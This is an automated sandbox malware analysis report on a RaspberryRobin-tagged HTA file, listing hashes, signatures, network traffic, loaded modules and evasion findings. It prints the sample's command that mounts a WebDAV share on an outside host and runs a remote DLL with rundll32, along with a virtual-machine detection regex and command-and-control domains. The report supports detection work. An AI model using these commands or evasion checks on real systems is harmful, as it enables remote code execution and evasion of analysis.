Windows Analysis Report
jqplot.hta

Overview

General Information

Sample name: jqplot.hta
Analysis ID: 1579287
MD5: 9f0c22ed3d7bb9da739c0435a03b8fc0
SHA1: 6589ff833c4325cd6f580f8e33ed10bf0bd86ead
SHA256: 69febfcc81d9b79faacbea1468bd0d88508025308a6741d8e2fbd6f7b100c283
Tags: hta, RaspberryRobin, user-aachum

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Gathers information about network shares
Sigma detected: Suspicious MSHTA Child Process
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.1% probability
Source: unknown HTTPS traffic detected: 104.21.90.205:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 147.45.112.248:443
Source: global traffic HTTP traffic detected:
    GET /2l5hd077he70d HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 969d6a2f.respectfulnesses.makeup
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
    GET /nz/mw/37.dll HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
    translate: f
    Host: 6t.lc
Source: global traffic DNS traffic detected: DNS query: 969d6a2f.respectfulnesses.makeup
Source: global traffic DNS traffic detected: DNS query: 6t.lc
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Sat, 21 Dec 2024 12:02:30 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Sat, 21 Dec 2024 12:02:51 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Sat, 21 Dec 2024 12:02:53 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Sat, 21 Dec 2024 12:02:55 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Sat, 21 Dec 2024 12:02:57 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Sat, 21 Dec 2024 12:03:00 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1384360474.0000000000735000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1352202628.0000000000725000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/
Source: net.exe, 0000000C.00000003.1384445225.000000000071F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/A#
Source: net.exe, 0000000C.00000003.1352202628.0000000000725000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/L#
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/nz
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/nz&
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/nz6v
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/
Source: mshta.exe, 00000000.00000002.1359717276.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1259253461.0000000005EB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/2l5hd077he70d
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1358804675.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359732065.0000000002DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359274340.0000000002DC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/2l5hd077he70d5hd077he70d
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/WQ
Source: mshta.exe, 00000000.00000003.1357441003.0000000002D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1358992498.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359686126.0000000002D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_053998B0 NtCreateThreadEx, 20_2_053998B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B10F4 20_2_050B10F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B1200 20_2_050B1200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BB640 20_2_050BB640
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BF189 20_2_050BF189
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BA580 20_2_050BA580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B679F 20_2_050B679F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C4394 20_2_050C4394
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C2FA8 20_2_050C2FA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B83C4 20_2_050B83C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B22DC 20_2_050B22DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B73D4 20_2_050B73D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05395B10 20_2_05395B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05396700 20_2_05396700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05393D40 20_2_05393D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_053998B0 20_2_053998B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0539A080 20_2_0539A080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0539B2D0 20_2_0539B2D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05391020 20_2_05391020
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05393250 20_2_05393250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05398850 20_2_05398850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0539AA40 20_2_0539AA40
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine Classification label: mal56.spyw.evad.winHTA@15/0@2/2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_processor
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32 V:\mw\37.dll, 7:02:13.25
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\jqplot.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time%
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 200
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: drprov.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ntlanman.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: davclnt.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: drprov.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: ntlanman.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: davclnt.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BA508 push esi; mov dword ptr [esp], ecx 20_2_050BA509
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C2F5F push esi; mov dword ptr [esp], ecx 20_2_050C2F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C4384 push esi; mov dword ptr [esp], ecx 20_2_050C4385
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BB5B0 push esi; mov dword ptr [esp], ecx 20_2_050BB5B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B73B4 push esi; mov dword ptr [esp], ecx 20_2_050B73B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B21D4 push esi; mov dword ptr [esp], ecx 20_2_050B21D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C42E8 push esi; mov dword ptr [esp], ecx 20_2_050C42E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B21E4 push esi; mov dword ptr [esp], ecx 20_2_050B21E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B21F8 push esi; mov dword ptr [esp], ecx 20_2_050B21F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C2EF6 push esi; mov dword ptr [esp], 000000CAh 20_2_050C2EF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BB5F5 push esi; mov dword ptr [esp], B0C44C70h 20_2_050BB5F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B56F4 push esi; mov dword ptr [esp], ecx 20_2_050B56F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_053A7570 push esi; mov dword ptr [esp], DC652A4Bh 20_2_053A7571
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: \KnownDlls32\testAPp.eXe
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 407
Source: C:\Windows\SysWOW64\timeout.exe Window / User API: threadDelayed 1782
Source: C:\Windows\SysWOW64\net.exe TID: 8172 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 8040 Thread sleep count: 1782 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8040 Thread sleep time: -178200s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: mshta.exe, 00000000.00000003.1358050857.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: yc|qemu|kvm|xeon|broad
Source: mshta.exe, 00000000.00000003.1353347251.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353289336.0000000006BBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1363655021.0000000006BBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UHgfSBsTLF9XR35sZbOWDpAkNsuyK9VsNeI6aZMW4BLwKDZpepc5Q1LV7HqQYLJj25J2UCGtz4YQj34GvPiIPvt0v8JCC0EmUcd
Source: mshta.exe, 00000000.00000003.1358358350.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: r=RegExp('epyc|qemu|kvm|xeon|broad','i');
Source: mshta.exe, 00000000.00000003.1358358350.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: epyc|qemu|kvm|xeon|broad
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1357251887.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1384360474.000000000073C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1494593782.00000000006F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000003.1353152128.0000000006B3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s5bSCqsMiFLyGhbWw4mxZmzBUDzXRP6Kr5Wbo5cdff3E5XLxnPOCFsDssy5imSstR6CioDn2Q1hKbZZwsZrPEf9gQrks8s4TukGQcbCSp2kP4M8VmcIH6HJ1Qvm2S5uJRnsYtUcPny5A2WGlEWnTtuv8sm9yGqSJkp0qDjh3aajoY86ntD1KmQzyg5mKLmgYhrIVJPwFM3jRj3mYgImx2jHj1tLyG19yTqH1SUeYuUYhMTOtYmWQcgpXLiq2eU0nIDakPgJSJYqSz75xuJ3
Source: mshta.exe, 00000000.00000003.1350769128.0000000007237000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1356764896.0000000006719000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352893472.0000000006A32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352235865.0000000006784000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352475996.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352811682.000000000697C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353064285.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353008981.0000000006AB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1352757029.000000000693B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1348355677.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1353347251.0000000006B3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 